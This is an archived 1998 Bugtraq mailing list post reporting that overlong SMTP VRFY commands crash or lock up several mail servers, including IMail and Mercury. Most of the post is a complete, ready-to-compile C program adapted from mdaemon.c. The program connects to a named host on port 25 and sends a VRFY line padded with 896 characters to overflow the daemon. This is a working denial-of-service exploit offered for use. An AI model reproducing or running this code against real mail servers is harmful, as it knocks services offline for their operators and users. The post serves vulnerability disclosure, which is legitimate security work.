Home page logo
/

bugtraq logo Bugtraq mailing list archives

smtp overflows
From: steven () EFNI COM (Jon Beaton)
Date: Wed, 8 Apr 1998 07:10:25 -0400


There have been more posts about the buffer overflows on smtp daemons,
so I thought this may be useful. After posting about these attacks on
SLMail and Imail, I found that there were alot more that were still
affected. On the few I've tried on the Mac, like Mercury, it had locked
the server up, much like Appleshare. Anyways, this is just mdaemon.c
with just a few tiny changes, just thought it may be useful. Btw, I just
wanted to note that this will also crash IMail, even though the author
has said it wasn't affected.

Jon


/*
mdaemon.c with a few small changes.
known to lock up the whole server with some daemons on the Mac

Cisc0 @ Undernet
*/

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

 void main(int argc, char *argv[])
 {
   struct sockaddr_in sin;
   struct hostent *hp;
   char *buffer;
   int sock, i;

   if (argc != 2) {
     printf("usage: %s <smtp server>\n", argv[0]);
     exit(1);
   }
   hp = gethostbyname(argv[1]);
   if (hp==NULL) {
     printf("Unknown host: %s\n",argv[1]);
     exit(1);
   }
   bzero((char*) &sin, sizeof(sin));
   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
   sin.sin_family = hp->h_addrtype;
   sin.sin_port = htons(25);
   sock = socket(AF_INET, SOCK_STREAM, 0);
   connect(sock,(struct sockaddr *) &sin, sizeof(sin));
   buffer = (char *)malloc(1000);
   sprintf(buffer, "VRFY ");
   for (i = 0; i<896; i++)
     strcat(buffer, "d");
   strcat(buffer, "\r\n");
   write(sock, &buffer[0], strlen(buffer));
   close(sock);
   free(buffer);
 }



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault